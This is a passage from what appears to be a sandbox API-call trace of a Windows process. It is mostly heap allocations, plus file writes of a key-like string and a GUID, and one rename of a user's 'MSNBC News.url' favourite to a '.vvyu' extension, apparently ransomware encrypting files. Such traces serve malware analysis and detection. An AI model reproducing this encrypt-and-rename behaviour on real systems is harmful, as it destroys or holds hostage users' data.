(in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0198.553] GetCurrentThreadId () returned 0x66c [0198.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0198.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5da0 [0198.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd95d8 [0198.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0198.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0198.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0198.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0198.554] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0198.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.555] GetCurrentThreadId () returned 0x66c [0198.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.555] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0198.555] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0198.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0198.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0198.556] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0198.556] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0198.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0198.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0198.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0198.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3098 [0198.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0198.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0198.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0198.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0198.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0198.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0198.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0198.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3038 [0198.557] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.557] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ab0 [0198.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0198.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0198.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0198.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0198.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3050 [0198.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0198.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0198.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0198.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3020 [0198.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0198.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30b0 [0198.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ad0 [0198.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0198.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3080 [0198.558] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0198.558] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea3068 [0198.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea30c8 [0198.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3068 [0198.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3080 | out: hHeap=0x620000) returned 1 [0198.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0198.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0198.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0198.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0198.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83b60 [0198.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3038 | out: hHeap=0x620000) returned 1 [0198.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea3038 [0198.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0198.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0198.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3098 | out: hHeap=0x620000) returned 1 [0198.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c998c8 [0198.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30c8 | out: hHeap=0x620000) returned 1 [0198.559] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0198.559] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83b60 | out: hHeap=0x620000) returned 1 [0198.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c99af8 [0198.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0198.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99d28 [0198.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3038 | out: hHeap=0x620000) returned 1 [0198.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0198.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0198.560] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0198.560] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0198.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0198.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0198.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0198.561] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0198.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0198.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0198.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0198.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0198.562] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3068 | out: hHeap=0x620000) returned 1 [0198.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0198.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea30b0 | out: hHeap=0x620000) returned 1 [0198.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0198.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3050 | out: hHeap=0x620000) returned 1 [0198.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3020 | out: hHeap=0x620000) returned 1 [0198.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0198.563] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0198.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0198.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea3008 | out: hHeap=0x620000) returned 1 [0198.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e94e28 | out: hHeap=0x620000) returned 1 [0198.564] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0198.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0198.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0198.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0198.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0198.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0198.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0198.565] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0198.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0198.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0198.566] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0198.566] WriteFile (in: hFile=0x568, lpBuffer=0x2e91710*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e91710*, lpNumberOfBytesWritten=0x312fb14*=0x80, lpOverlapped=0x0) returned 1 [0198.567] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e91710 | out: hHeap=0x620000) returned 1 [0198.567] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0198.567] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0198.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0198.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0198.568] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0198.568] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0198.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.568] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.568] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0198.569] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0198.569] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0198.569] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0198.569] CloseHandle (hObject=0x568) returned 1 [0198.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0198.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x880) returned 0x2ea6a68 [0198.571] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0198.571] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSNBC News.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msnbc news.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\MSN Websites\\MSNBC News.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\msn websites\\msnbc news.url.vvyu")) returned 1 [0198.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0198.572] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9610 | out: hHeap=0x620000) returned 1 [0198.572] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0198.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0198.575] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x798f9b10, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x798f9b10, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee582f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSNBC News.url", cAlternateFileName="MSNBCN~1.URL")) returned 0 [0198.576] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0198.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0198.576] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0198.576] PeekMessageW (in: lpMsg=0x312ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312ff08) returned 0 [0198.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0198.577] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0198.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.577] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.578] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.579] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.580] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.580] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.581] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.581] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.582] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x2e902a8 [0198.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0198.582] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.583] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.583] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.584] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.584] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.585] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0198.585] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.586] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.586] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.587] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.587] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0198.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.588] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.588] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.589] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.589] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.590] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0198.590] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.591] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.591] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.592] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb4a00 [0198.592] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0198.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0198.593] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb4a00 | out: hHeap=0x620000) returned 1 [0198.593] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, 